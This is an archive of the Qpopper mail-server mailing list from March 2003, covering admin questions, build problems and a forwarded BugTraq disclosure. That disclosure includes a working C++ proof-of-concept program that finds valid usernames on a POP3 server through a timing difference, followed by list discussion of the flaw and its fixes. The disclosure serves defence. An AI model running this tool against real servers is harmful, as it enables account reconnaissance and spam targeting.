Instead, use `find /var/mail -atime +30' to generate a list of mailboxes
that haven't been accessed in the past 30 days. Substitute your preferred
number of days.
To delete all mailboxes that have not been accessed in the past 30 days,
use `find /var/mail -atime +30 -print -exec rm {} \;' . That will list
each offending mailbox, then delete it.
To automate the process, run something like this script as a cron job once
per day.
------------------------
#!/bin/sh
#
# Delete mail spool files that have not been accessed
# in the past 30 days. If someone doesn't read his/her
# e-mail at least that often, we assume he/she doesn't
# care about e-mail. The "echo" lines and the "-print"
# argument in the find command causes cron to mail
# output to root, giving us a daily list of users whose
# mail has been deleted.
#
# cron runs this at midnight every night and e-mails the
# output to root.
#
echo "***** DAILY MAILBOX PURGE ****"
echo " "
echo "The following mailboxes have not been accessed by their"
echo "owners in the past 30 days. If a user does not read"
echo "his/her e-mail at least that often, we assume he/she"
echo "is not interested in e-mail, so we delete the mailbox."
echo " "
echo "These mailboxes have been deleted:"
echo " "
find /var/mail -atime +30 -print -exec rm {} \;
-----------------------
Cron will mail the output to the root mailbox. Save these messages for
some amount of time, so if a custome screams "where did my mail go" you
can explain what happened, when it happened, and why it happened.
WARNING: If you delete mailboxes that haven't been accessed in n days (or
for that matter if you manipulate or modify mailboxes in any way for any
reason), make sure your customers know and accept the fact that this is
your policy. Otherwise I guarantee you'll have a lynch mob after you.
--
Chip Old (Francis E. Old) E-Mail: fold at bcpl dot net
Manager, BCPL Network Services Phone: 410-887-6180
Manager, BCPL.NET Internet Services FAX: 410-887-2091
320 York Road
Towson, MD 21204 USA
Date: Sat, 15 Mar 2003 09:39:54 -0800
From: Randall Gellens <randy at qualcomm dot com>
Subject: Re: Qpopper 4.0.5 (final) available
At 1:48 PM +0000 3/14/03, Mark wrote:
> Could someone please tell me what the difference is between these two files?
>
> qpopper4.0.5-no-test.tar.gz
> qpopper4.0.5.tar.gz
>
> Does "no-test" mean it is not a test-version? Or does it mean it contains no
> tests?
The 'no-test' tarball omits the extensive test files. Since the test
files are of little interest to anyone except developers (and only
test certain aspects), the 'no-test' tarball provides a smaller, and
hence more convenient, distribution.
> I am not real happy with the way Qualcom has sprung the bad news on people,
> along with supplying a workable exploit to use. That is like saying, "Hey,
> here is a ready-made way to hack your server; and guess what? Your admin
> does not know about it yet! Go for it!"
This is not the case. Qualcomm learned of the exploit at the same
time and the same way as everyone else: the exploit was announced in
a public mailing list. Qualcomm was not informed in advance. As
soon as I became aware of the exploit, I worked as fast as I could to
verify it and produce a high-quality fix.
What lead you to think that Qualcomm had announced the exploit?
--
Randall Gellens
Opinions are personal; facts are suspect; I speak for myself only
-------------- Randomly-selected tag: ---------------
Only in a police state is the job of a policeman easy.
--Orson Welles
Date: Sat, 15 Mar 2003 22:10:14 +0100
From: noetheriano <noetheriano at bsdpower dot org>
Subject: Re: Installation problem on FreeBSD
On Saturday, 15 March, 2003 at 09:32:22 +0100, Narrowstream wrote:
> Hello all,
>
> The problem is the same with qpopper 4.0.4 and the last 4.0.5
>
> I work on FreeBSD 4.7. with sendmail 8.12.8
>
> Here is the installation problem :
>
[...]
Hi,
in FreeBSD U should compile and install qpopper with ports system.
If you want the latest version, 4.0.5 then you have to update
your ports tree via cvs then:
# cd /usr/ports/mail/qpopper && make install clean
So you should have qpopper installed smoothly.
If you compile from source in freebsd often you get errors like
that because standard configure script doesn't respect FreeBSD
organization of filesystems. Using ports instead you will apply
all patches needed for a smooth compilation and installation
in FreeBSD environment.
Hoping this is useful for U...
Regards,
Andrea
--
noetheriano <noetheriano at bsdpower dot org>
KeyID: 1024D/9BBF5777
Fingerprint: EB68 5AC0 F0E5 8B24 5777 72CC D4AC 3B36 9BBF 5777
PubKey: http://www.bsdpower.org/~noeth/noethgpgkey.asc
Date: Sat, 15 Mar 2003 15:19:05 -0800
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: Qpopper 4.0.5 (final) available
--On Saturday, March 15, 2003 7:45 AM -0800 The Little Prince
<thelittleprince at asteroid-b612 dot org> wrote:
> yeah, it does. i've seen exactly what he's talking about, replying to one
> specific person.
Yet another good reason not to "reply-all" when replying to a mailing list
post. I prefer to take my answers on the list, and I expect people asking
questions to monitor the list for the answer, just as with newsgroups.
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: Fw: qpopper timing analysis on to determine if a username exists on a system
Date: Sat, 15 Mar 2003 21:18:23 -0500
------=_NextPart_000_00B6_01C2EB38.69506E90
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Something else from BugTraq about Qpopper.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
----- Original Message -----
From: "Dennis Lubert" <plasmahh at informatik.uni-bremen dot de>
To: <bugtraq at securityfocus dot com>
Sent: Saturday, March 15, 2003 2:13 PM
Subject: qpopper timing analysis on to determine if a username exists on a
system
> Hello,
>
> during development of a pop3 tool I found an issue that makes it possible
> for any user to check the validity of a user on a target system. If a user
> is valid and an invalid password has been supplied, then the system waits
> ~10 seconds until it sends a disconnect message and disconnect. If the
> username was not correct, then it disconnect immediately after the wrong
> password.
>
> This makes it possible to scan a server for valid users, to generate spam
> sending lists, or to check a username for another kind of attack.
>
> Tested against qpopper 3.1 and 4.0.4, others might be affected as well.
>
> Attached is the source code for a program that will do a simple check on a
> pop3 server. Additionally qpopper will also return an answer if the
> username supplied has a UID < 100 (< 10 for 3.1), which will also been
checked.
>
> The fix should be simple, there must be a usleep() call or similar that
> should either be deleted, or added also to the part where the username was
> not correct.
>
> greets
>
> Dennis
------=_NextPart_000_00B6_01C2EB38.69506E90
Content-Type: application/octet-stream;
name="poptest.cpp"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="poptest.cpp"
/**=0A
* $Author: plasmahh $=0A
* $Date: 2003/03/11 15:01:45 $=0A
*=0A
* This is a proof of concept code to check wheter a given username is
valid on=0A
* a system running qpopper 4.0.4 and possibly other versions.=0A
*=0A
* Compile :=0A
*=0A
* g++ -Wall poptest.cpp -o poptest=0A
* or =0A
* g++ -D_DEBUG_ poptest.cpp -o poptest=0A
* (to see whats going on) =0A
*=0A
* Run :=0A
*=0A
* ./poptest <hostname> <username>=0A
*=0A
* e.g.=0A
*=0A
* ./poptest 127.0.0.1 root=0A
*=0A
* When a username is valid on the system, qpopper waits ~10 seconds
before it=0A
* sends the sing off message to the user. If the username is not valid,
it=0A
* will send it immediately after the password is entered.=0A
* If the username has a uid < 100 qpopper is even so nice to tell us.=0A
*/=0A
=0A
#include <iostream>=0A
extern "C" {=0A
#include <sys/socket.h>=0A
#include <sys/types.h>=0A
#include <sys/time.h>=0A
#include <netinet/in.h>=0A
#include <fcntl.h>=0A
#include <errno.h>=0A
#include <unistd.h>=0A
#include <netdb.h>=0A
#include <stdio.h>=0A
#include <string.h>=0A
}=0A
=0A
using namespace std;=0A
=0A
//#define _DEBUG_ 1=0A
=0A
int main ( int argc, char * argv[])=0A
{=0A
struct timeval tim1;=0A
struct timeval tim2;=0A
int sock;=0A
struct hostent *peerip;=0A
struct sockaddr_in peer;=0A
char * buf = new char[4096];=0A
=0A
=0A
if ( argc != 3 )=0A
{=0A
cerr << "Must give username and host" << endl;=0A
return -1;=0A
}=0A
=0A
=0A
sock = socket ( AF_INET, SOCK_STREAM, 0);=0A
=0A
peerip = gethostbyname ( argv[1] );=0A
=0A
if ( ! peerip ) =0A
{=0A
cerr << "Hostname not valid" << endl;=0A
return -1;=0A
}=0A
cout << "Validating username " << argv[2] << " , please stand by.."
<< endl;=0A
=0A
peer.sin_family = AF_INET;=0A
peer.sin_port = htons(110);=0A
peer.sin_addr = *((struct in_addr *) peerip->h_addr);=0A
memset(&(peer.sin_zero),0,8);=0A
=0A
=0A
=0A
if ( connect( sock, (sockaddr *) & peer, sizeof(struct sockaddr)) < 0)=0A
{=0A
cerr << "Could not connect !" << endl;=0A
return -1;=0A
} =0A
=0A
memset ( buf, 0, 4096 );=0A
read ( sock, buf, 4096 );=0A
#ifdef _DEBUG_=0A
cout << "<- " << buf << endl;=0A
#endif=0A
=0A
=0A
=0A
memset ( buf, 0, 4096 );=0A
snprintf ( buf, 4096, "USER %s\r\n", argv[2]);=0A
write ( sock, buf, strlen(buf) );=0A
#ifdef _DEBUG_=0A
cout << "-> " << buf << endl;=0A
#endif=0A
=0A
memset ( buf, 0, 4096 );=0A
read ( sock, buf, 4096 );=0A
#ifdef _DEBUG_=0A
cout << "<- " << buf << endl;=0A
#endif=0A
=0A
write ( sock, "PASS xxx\r\n", 11);=0A
#ifdef _DEBUG_=0A
cout << "-> PASS xxx" << endl;=0A
#endif=0A
=0A
memset ( buf, 0, 4096 );=0A
read ( sock, buf, 4096 );=0A
#ifdef _DEBUG_=0A
cout << "<- " << buf << endl;=0A
#endif=0A
=0A
if ( strstr( buf, "100") != NULL )=0A
{=0A
cout << "User has probably an UID < 100 and is a valid user." <<
endl;=0A
close(sock);=0A
return 0;=0A
}=0A
=0A
gettimeofday(&tim1,NULL);=0A
memset ( buf, 0, 4096 );=0A
read ( sock, buf, 4096 );=0A
#ifdef _DEBUG_=0A
cout << "<- " << buf << endl;=0A
#endif=0A
gettimeofday(&tim2,NULL);=0A
=0A
double s = (tim2.tv_sec - tim1.tv_sec);=0A
s += ((double)(tim2.tv_usec - tim1.tv_usec))/1000000.0;=0A
=0A
cout << "Disconnected after " << s << " seconds." << endl;=0A
=0A
if ( s > 1.0 )=0A
{=0A
cout << "User \"" << argv[2] << "\" is probably a valid user" <<
endl;=0A
}=0A
else=0A
{=0A
cout << "User \"" << argv[2] << "\" is probably NOT a valid user"
<< endl;=0A
}=0A
close(sock);=0A
return 0;=0A
=0A
}=0A
------=_NextPart_000_00B6_01C2EB38.69506E90--
Date: Sat, 15 Mar 2003 21:06:17 -0600
From: Ken Hohhof <ken at mixedsignal dot com>
Subject: Re: Fw: qpopper timing analysis on to determine if a username
>> during development of a pop3 tool I found an issue that makes it possible
>> for any user to check the validity of a user on a target system. If a user
>> is valid and an invalid password has been supplied, then the system waits
>> ~10 seconds until it sends a disconnect message and disconnect. If the
>> username was not correct, then it disconnect immediately after the wrong
>> password.
Is this really true? If so, I think it may be system dependent.
On our mailserver running qpopper 4.04 on RH Linux 7.1 with PAM
authentication, I don't see the claimed behavior. The username/password
pair is submitted to PAM and if it fails there is the 10 second delay even
if the username was invalid.
Date: Sat, 15 Mar 2003 23:04:49 -0500
From: Joe Maimon <jmaimon at ttec dot com>
Subject: Qpopper 4.0.5 doesnt build poppassd with pam?
RedHatLinux 7 System.
Configure line:
./configure --with-openssl --enable-apop --enable-popuid=pop
--enable-poppassd --with-drac --prefix=/usr --enable-standalone --with-pam
Make output:
make[2]: Entering directory `/home/joe/download/pop3/qpopper4.0.5/password'
gcc -c -I.. -I. -I.. \
-I../popper -I../common \
-g -O2 -DHAVE_CONFIG_H -DLINUX -DUNIX auth_user.c -o auth_user.o
auth_user.c:569:27: warning: no newline at end of file
auth_user.c:569:27: warning: no newline at end of file
gcc -c -I.. -I. -I.. \
-I../popper -I../common \
-g -O2 -DHAVE_CONFIG_H -DLINUX -DUNIX poppassd.c -o poppassd.o
gcc -o poppassd auth_user.o poppassd.o -ldrac -ldrac -ldl -lpam \
../common/libcommon.a
poppassd.o: In function `chkPass':
/home/joe/download/pop3/qpopper4.0.5/password/poppassd.c:1197: undefined
reference to `auth_user'
collect2: ld returned 1 exit status
make[2]: *** [poppassd] Error 1
make[2]: Leaving directory `/home/joe/download/pop3/qpopper4.0.5/password'
make[1]: *** [poppassd] Error 2
make[1]: Leaving directory `/home/joe/download/pop3/qpopper4.0.5/popper'
make: *** [popper_server] Error 2
Date: Sat, 15 Mar 2003 22:14:12 -0800
From: Randall Gellens <randy at qualcomm dot com>
Subject: Re: BLUEHILL password thingy??????
At 6:50 PM -0500 2/26/03, Alan Brown wrote:
> On 26 Feb 2003, scott wrote:
>
>> Pardon my ignoramusnous, but why is it I get the following response,
>> whenever I send a post in to the qpopper list without the word BLUEHILL
>> in the subject line???
>
> Because some bozo subscribed to the list using a Tagged message delivery
> agent (or other doorkeeper) without bothering to whitelist the list or
> inspect his held queue (I assume that his setup is homebuilt and
> doesn't bother with such things)
Even worse, the setup sends its responses to the address in the
"From" header, which is a serious violation of RFC 2821.
Automatically generated messages MUST be sent to the return-path
address.
> Would the list maintainers please remove whoever the bluehill.com person
> is until they learn some list manners?
I believe this has been done. BTW, it's best to send such requests
to the address in the "List-Owner" header rather than posting them
in-line: listmaster at lists.pensive dot org
--
Randall Gellens
Opinions are personal; facts are suspect; I speak for myself only
-------------- Randomly-selected tag: ---------------
The militarization of the rhetoric supporting the war on drugs rots
the public debate with a corrosive silence. The political weather
turns gray and pinched. People who become accustomed to the
arbitrary intrusions of the police also learn to speak more softly
in the presence of political authority, to bow and smile and fill
out the printed forms with cowed obsequiousness of musicians
playing waltzes at a Mafia wedding.
--Lewis Lapham, "A Political Opiate" (Harper's, December 1989)
Date: Sat, 15 Mar 2003 22:20:19 -0800
From: Randall Gellens <randy at qualcomm dot com>
Subject: Re: QPOPPER SENDMAIL/PROCMAIL: AND NFS
At 12:32 AM -0500 2/27/03, Chuck Yerkes wrote:
> Can you have multiple deliverers and poppers over NFS?
> Sure, write your own locking, rewrite mail.local and qpopper chunks,
I'm not recommending it's use, but Qpopper does have an option that
in theory makes it safe to use over NFS. See samples/qpopper.config:
# When set, Qpopper uses a method of opening lock files that may work
# over NFS. This has not been thoroughly tested, however.
#
# Default: false
#
# set no-atomic-open = false
--
Randall Gellens
Opinions are personal; facts are suspect; I speak for myself only
-------------- Randomly-selected tag: ---------------
If we do not change our direction we are likely to end up where we are
headed.
Date: Sat, 15 Mar 2003 22:59:17 -0800
From: Randall Gellens <randy at qualcomm dot com>
Subject: Re: Qpopper/SSL problem
At 4:09 PM +0100 2/28/03, Bernt Guldbrandtsen wrote:
> set tls-support = stls
> Feb 28 15:47:52 node02 popper-4.0.4[45588]: (null) at
> hag-i001.agrsci.dk (172.20.128.66): -ERR Unknown command:
> "^Àf^A^C^A".
This looks like your client is trying to use the alternate-port
method instead of STLS. Try either switching to a client that does
support STLS, setting up an additional Qpopper on port pop3s that
uses alternate-port, or both.
--
Randall Gellens
Opinions are personal; facts are suspect; I speak for myself only
-------------- Randomly-selected tag: ---------------
If you think dogs can't count, try putting three dog biscuits in
your pocket then giving Fido only two of them. --Phil Pastoret
Date: Sat, 15 Mar 2003 22:56:38 -0800
From: Randall Gellens <randy at qualcomm dot com>
Subject: Re: Correct permissions?
At 4:56 PM -0500 2/27/03, Chuck Yerkes wrote:
> The pop daemon must be able to write to the /var/mail DIRECTORY.
> Oh, and with those permissions on your Mailbox (why it's named
> Mailbox is beyond me) allows ANYone to read your mail and anyone
> in group USER to write (change) your mail.
Usually, the group is set to 'mail' not 'user'; Qpopper normally runs
with group 'mail' and the UID of the user. This normally allows it
to access the spool directory.
--
Randall Gellens
Opinions are personal; facts are suspect; I speak for myself only
-------------- Randomly-selected tag: ---------------
The irony of the Information Age is that it has given new
respectability to uninformed opinion. --John Lawton
From: Mark <admin at asarian-host dot net>
Date: Sun, 16 Mar 2003 12:01:09 GMT
Subject: Re: Qpopper 4.0.5 (final) available
----- Original Message -----
From: "The Little Prince" <thelittleprince at asteroid-b612 dot org>
To: "Mark" <admin at asarian-host dot net>
Cc: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Saturday, March 15, 2003 5:20 PM
Subject: Re: Qpopper 4.0.5 (final) available
> On Sat, 15 Mar 2003, Mark wrote:
>
> > What the hell are you talking about?? Nobody's mail gets bounced, or has
> > jump through some sign-up hoops. You are obviously seriously mistaken.
> > Maybe your domain is in the access.db, as known spammer. I would have
> > looked it up, but I care too less for your tone to bother.
> >
>
> yeah, it does. i've seen exactly what he's talking about, replying to one
> specific person.
Your cryptic response notwithstanding, the fact that you emailed your
response to me as well, I would say kinda disproves your mail being bounced,
now don' it?
- Mark
From: Mark <admin at asarian-host dot net>
Date: Sun, 16 Mar 2003 13:49:36 GMT
Subject: Re: Qpopper 4.0.5 (final) available
----- Original Message -----
From: "Randall Gellens" <randy at qualcomm dot com>
To: <mennecke at arcor dot de>
Cc: <qpopper at lists.pensive dot org>
Sent: Saturday, March 15, 2003 7:22 PM
Subject: Re: Qpopper 4.0.5 (final) available
> This is not the case. Qualcomm learned of the exploit at the same
> time and the same way as everyone else: the exploit was announced in
> a public mailing list. Qualcomm was not informed in advance. As
> soon as I became aware of the exploit, I worked as fast as I could to
> verify it and produce a high-quality fix.
And you have my thanks for it. :)
> What lead you to think that Qualcomm had announced the exploit?
A lack of RTFM on my end. In my haste, I mistook the forward from that
bugtraq guy as coming from a Qualcomm person. My apologies for that.
- Mark
Date: Sun, 16 Mar 2003 08:58:11 -0500 (EST)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: .cache problem
On Sat, 15 Mar 2003, Ken Hohhof wrote:
> First, I regularly do something like:
>
> cd /var/spool/mail
> ls -lS | head
> ls -lrt | head
> The first ls finds mailbox hogs, the second finds abandoned mailboxes.
Find is probably more useful for this, but YMMV
> I guess you may feel this doesn't accomplish your goal because the
> date on the mailspool file will be recent as long as it is receiving
> mail even if it is not being checked.
hint: ls -lu or find -atime/-mtime
if you look at atimes in particular, you'll see the users who are
reading but leaving mail on the server.
In an ISP context, I found that find -size +1000k -atime -5 was useful
for this kind of tracking, especially given a userbase sometimes lacking
in $CLUE
AB
Date: Sun, 16 Mar 2003 09:00:16 -0500 (EST)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: .cache problem
On Sat, 15 Mar 2003, Chip Old wrote:
> To delete all mailboxes that have not been accessed in the past 30 days,
> use `find /var/mail -atime +30 -print -exec rm {} \;' . That will list
> each offending mailbox, then delete it.
cat /dev/null > $mailbox is usually safer than rm, especially in systems
where the mail spool directory isn't set 1777. (Some people _are_ that
paranoid)
Date: Sun, 16 Mar 2003 06:48:53 -0800 (PST)
From: The Little Prince <thelittleprince at asteroid-b612 dot org>
Subject: Re: Qpopper 4.0.5 (final) available
On Sun, 16 Mar 2003, Mark wrote:
> > yeah, it does. i've seen exactly what he's talking about, replying to one
> > specific person.
>
>
> Your cryptic response notwithstanding, the fact that you emailed your
> response to me as well, I would say kinda disproves your mail being bounced,
> now don' it?
>
never said you were that specific person :)
--Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
thelittleprince at asteroid-b612.org http://www.asteroid-b612 dot org
"This will prove a brave kingdom to me,
where I shall have my music for nothing"
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
From: "Narrowstream" <technique at narrowstream dot net>
Subject: RE : Installation problem on FreeBSD
Date: Mon, 17 Mar 2003 08:29:59 +0100
Hi
Thx for this answer. I usually use the ports, but if you want to test a
new
version that is not yet in the ports or test a beta one, it's not
possible.
(the time for a program appears in the ports is about 1 or 2 days and
when
you have a security hole, it's too long).
I speak about my problem because with the other programs (apache, bind,
sendmail, proftpd, pureftp, php, mysql, ...) I don't have any problem
when I
do the "make install"
Thanks
Stephane
On Saturday, 15 March, 2003 at 09:32:22 +0100, Narrowstream wrote:
> Hello all,
>
> The problem is the same with qpopper 4.0.4 and the last 4.0.5
>
> I work on FreeBSD 4.7. with sendmail 8.12.8
>
> Here is the installation problem :
>
[...]
Hi,
in FreeBSD U should compile and install qpopper with ports system. If
you
want the latest version, 4.0.5 then you have to update your ports tree
via
cvs then:
# cd /usr/ports/mail/qpopper && make install clean
So you should have qpopper installed smoothly.
If you compile from source in freebsd often you get errors like that
because
standard configure script doesn't respect FreeBSD organization of
filesystems. Using ports instead you will apply all patches needed for a
smooth compilation and installation in FreeBSD environment.
Hoping this is useful for U...
Regards,
Andrea
--
noetheriano <noetheriano at bsdpower dot org>
KeyID: 1024D/9BBF5777
Fingerprint: EB68 5AC0 F0E5 8B24 5777 72CC D4AC 3B36 9BBF 5777
PubKey: http://www.bsdpower.org/~noeth/noethgpgkey.asc
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O
From: Chris Shenton <Chris.Shenton at hq.nasa dot gov>
Date: Mon, 17 Mar 2003 10:04:36 -0500
Eric Luyten <Eric.Luyten at vub.ac dot be> writes:
> Care to enlighten us on your filename structure ?
> It's definitely not stock Maildir, is it ?
Yes, see:
http://cr.yp.to/proto/maildir.html
Naturally the POP/IMAP/WebGUI mail access mechanisms must all agree to
how the flags are interpreted.
The courier-imap server does, and takes it a step further with some
additional flags in a naming convention and Maildir use they call
"maildir++":
http://www.inter7.com/courierimap/README.maildirquota.html
> What IMAP search capabilities would you be able to
> satisfy, using only these meta-data ?
Content search would require opening the files, natch. But at least
you don't have to open files and scan for new mail, open and rewrite
files just to mark it read, open and rewrite then rewrite files again
to mark a message as deleted.
But the original question was about POP, was it not? IMAP search is a
bit outside the scope.
Date: Mon, 17 Mar 2003 11:42:10 -0600
From: David Champion <dgc at uchicago dot edu>
Subject: Re: Fwd: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
* On 2003.03.13, in <036240695432727052065 at lists.pensive dot org>,
* "Greg Earle" <earle at isolar.DynDNS dot ORG> wrote:
>
> Happymail sounds great.
>
> Any chance of upgrading this patch to the latest Qpopper 4.0.5 release?
Certainly. The 4.0.4 patch applies cleanly on 4.0.5, but since it could
trigger conflicts with other patches, I re-diffed for 4.0.5. I've
updated the link on my web page:
http://home.uchicago.edu/~dgc/sw/qpopper/index.html
> > The biggest social cost to us was that the POP authentication failure
> > caused Eudora to forget people's passwords, but since we encourage users
> > not to make Eudora remember their passwords anyway, that was a failure
> > we could easily live with.
>
> Can you explain this a little more? I'm not sure I've run into anything
> similar to this phenomenon ...
A lot of our users tick the box in Eudora that asks it to save the
POP account's username and password information on the client PC.
Apparently, whenever the POP server returns any -ERR status during
authentication, Eudora decides that the password must be incorrect, and
"forgets" it -- deletes it from both memory and the disk file where it's
stored. (If I knew another error that I could return from qpopper that
would tell Eudora that the authentication failed for some reason *other*
than a bad username/password, I'd use it. But I don't.) So the next time
the client tries to grab mail, whether interactively or automatically,
it pops up the password dialogue, because Eudora no longer knows about
the saved password.
The trouble in this is that a lot of users will set up their account or
change their password, and write the password on a Post-It. They never
memorize the password, they just copy it directly from the Post-It to
Eudora the first time they check mail, and Eudora remembers it for them
thereafter. So if they hit the Happymail deferral, the password is lost
in Eudora, and they need to reauthenticate through our accounts office,
which is at the farthest-away end of campus across vast wasted fields
of frozen tundra and pits of fire, rife with battle among angels and
demons, where no human -- and certainly no professor -- should be called
upon to travel. (So they send graduate students as "representatives.")
But we don't mind that much, because we tell people when they receive
their accounts initially that it's their duty to remember passwords, and
it's important not to store them in Eudora.
--
-D. dgc at uchicago dot edu NSIT University of Chicago
"The whole thrust of the text adventure was one picture was worth
a thousand words and we would rather give you the thousand words."
- Dave Lebling, Implementor
Subject: Re: Avoiding copy-to-.luser.pop-and-back-to-luser spool I/O overhead?
Date: Mon, 17 Mar 2003 11:47:51 -0800
From: Greg Earle <earle at isolar.DynDNS dot ORG>
Back on Tue, 11 Mar 2003 at 10:18:52 AM PST, Gregory Hicks wrote:
> I basically had the same problem except with a Sun 3500 with 2K+ users...
>
> enable-temp-drop-dir,
> enable-servermode,
> enable-keep-temp-drop,
> and
> enable-cache-dir
>
> Your throughput should increase AFTER the next time those user login
> since popper will just be keeping track of the changes...
OK, I've installed Qpopper 4.0.5 with the above changes, modulo the
server mode stuff - since, as I mentioned, I can't guarantee that the
spool won't be read/modified by some other client over NFS (one of the
recalcitrant users, with a 93 mbyte spool file, normally POPs in but
sometimes gets the urge to ssh over to an Ultra 5+ and check his mail
via Pine ... grrrr).
So, the good thing is, I now have the I/O load split in half, across 2
disks. So far so good.
But now what I don't understand is this:
I now have 2 directories - the traditional "/var/mail" (now on a newer
36 Gbyte SCSI disk) and a new one, "/var/maildrop", for the .luser.pop
files (configured via "--enable-temp-drop-dir=/var/maildrop"), which is
on the old 18 Gbyte external SCSI disk (which is mounted on "/var").
I'm not sure what "--enable-keep-temp-drop" is getting me here ... at
the end of the user's session, ".luser.pop" is reduced back to size 0,
and their "/var/mail/luser" spool file is updated. So, yeah, the
temp-drop has been kept ... um, great. What good did that do me?
I *thought* that "--enable-keep-temp-drop" would get me this behavior:
(1) luser POPs in
(2) Qpopper 4.0.5 copies /var/mail/luser to /var/maildrop/.luser.pop
(3) Messages get processed
(4) /var/maildrop/.luser.pop gets copied back to /var/mail/luser
(5) /var/maildrop/.luser.pop *gets left alone and not zero'ed-out*
I then expected this to happen the next time the luser POPs in:
(6) Qpopper 4.0.5 stat()'s the "/var/mail/luser" file and also the
"/var/mail/.luser.pop" file
(7) If the "/var/mail/luser" file hasn't changed since the last POP
access (meaning "/var/mail/luser" and "/var/maildrop/.luser.pop"
will be exactly the same size/contents), it locks(?) the mail
spool file and *doesn't do the copy to "/var/maildrop/.luser.pop"*,
thus saving half the I/O overhead of a normal transaction
Instead, it seems like Qpopper 4.0.5 - at least, when "server-mode"
isn't enabled/used, anyway - always zeroes out the ".luser.pop" file
at the end of the session, and always copies the "luser" spool file to
the now-always-empty ".luser.pop" file at the start of the next session.
Why?
- Greg
Date: Tue, 18 Mar 2003 09:25:20 +0100
From: Martin Kellermann <Kellermann at sk-datentechnik dot com>
Subject: Re: Fw: qpopper timing analysis on to determine if a username
At 21:06 15.03.2003 -0600, you wrote:
> >> during development of a pop3 tool I found an issue that makes it possible
> >> for any user to check the validity of a user on a target system. If a user
> >> is valid and an invalid password has been supplied, then the system waits
> >> ~10 seconds until it sends a disconnect message and disconnect. If the
> >> username was not correct, then it disconnect immediately after the wrong
> >> password.
>
>Is this really true? If so, I think it may be system dependent.
>
>On our mailserver running qpopper 4.04 on RH Linux 7.1 with PAM
>authentication, I don't see the claimed behavior. The username/password
>pair is submitted to PAM and if it fails there is the 10 second delay even
>if the username was invalid.
hmmm...
our system (4.0.5 on linux) there is a 10 sec. delay before qpopper
tells "-ERR [AUTH] Pass...."
but then there is a second delay (approx. 10 sec.) if the username exists,
before
qpopper quits the connection.
if the user does not exists, qpopper quits immediately after "-ERR [AUTH]
Pass...."
M. Kellermann
Kellermann at sk-datentechnik dot com
sk datentechnik GmbH
Stalleickenweg 5
44867 Bochum
Tel 02327-9501-0
Fax 02327-9501-25
Date: Thu, 20 Mar 2003 09:48:17 -0600
From: Brad Blix <brad at cpinternet dot com>
Subject: home-dir-misc not working in 4.0.5
When I define home-dir-misc in the configuration file I get "Unable to
process config file /etc/qpopper.conf" from the qpopper program. I have
also tried to compile qpopper with --enable-home-dir-misc and it is
still putting the .cache and .pop files in the default spool directory.
Am I doing something wrong?
Brad
Date: Thu, 20 Mar 2003 14:19:38 -0500
From: Tim Meader <tmeader at cne-odin.gsfc.nasa dot gov>
Subject: Question about hashed directories...
Hello all,
I am about at the end of my rope. Here on center at NASA we have three main
servers that handle POP connections... our problem is that a great majority
of users leave their mail on the server... which obviously is horrible for
POP performance.
Regardless, I have tweaked and tweaked as much as possible, and am making a
final change tonight. In particular I would like anyones' feedback on what
kind of performance increase switching to hashed directories might achieve.
I have procmail setup to use them, as well as a hacked IMAP I changed that
will allow access to the hashed spools as well. My current setup is as
follows...
Each machine is an E250 from Sun running Solars 8
Approx 1,500 users on each, with the mail spools under /var/mail
Qpopper 4.0.5 in servermode, running with .pop files set to a different
disk from the mailspool (same controller though unfortunately).
2GB of RAM
40GB SCSI 10K drives
Qpopper running out of xinetd with the following setup...
service pop3
{
flags = REUSE
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/local/etc/qpopper
port = 110
server_args = -s -b /var/mail/bulletins
rlimit_cpu = 120
instances = 150
cps = 110 10
disable = no
}
Also, I notice that from time to time I will see a qpopper session out
there running as user root, and not the actual user.... keep in mind that
our system is just extremely bogged down... could those just be the initial
startup of qpopper that hasn't had a chance to switch to the user
permission yet? I'm hoping so.
Thanks in advance.
---
Tim Meader
ODIN Unix Group
ACS Government Services, Inc. - (301) 286-8013
tmeader at cne-odin.gsfc.nasa dot gov
Date: Sun, 16 Mar 2003 16:49:57 -0500 (EST)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: Fw: qpopper timing analysis on to determine if a username exists
On Sat, 15 Mar 2003, Alan W. Rateliff, II wrote:
> Something else from BugTraq about Qpopper.
> > during development of a pop3 tool I found an issue that makes it possible
> > for any user to check the validity of a user on a target system. If a user
> > is valid and an invalid password has been supplied, then the system waits
> > ~10 seconds until it sends a disconnect message and disconnect. If the
> > username was not correct, then it disconnect immediately after the wrong
> > password.
I thought this atatck was old news on qpopper.
Better than a fixed delay, some random sleep would be useful, as it
means that the attacker can't infer validity of login/password from
remaining slight timing differences.
AB
From: "Narrowstream" <technique at narrowstream dot net>
Subject: RE : .cache problem
Date: Tue, 18 Mar 2003 18:09:30 +0100
First, I want to thank all the people that answer to my problem.
The use of "ls -lu" is a good choice, but I still have a problem.
If you have mail in your mailbox and you check it, the access time is
modified.
If you DON'T have mail, the access time is NOT modified.
And that's a problem.
If I do want to know only when mailbox are accessed, I have to combine
the
"ls -lu" with the .cache file.
Isn't it another solution ?
Thanks again
Stephane
-----Message d'origine-----
De : Alan Brown [mailto:alanb at digistar dot com]
Envoyé : dimanche 16 mars 2003 15:00
À : Chip Old
Cc : Subscribers of Qpopper
Objet : Re: .cache problem
On Sat, 15 Mar 2003, Chip Old wrote:
> To delete all mailboxes that have not been accessed in the past 30
> days, use `find /var/mail -atime +30 -print -exec rm {} \;' . That
> will list each offending mailbox, then delete it.
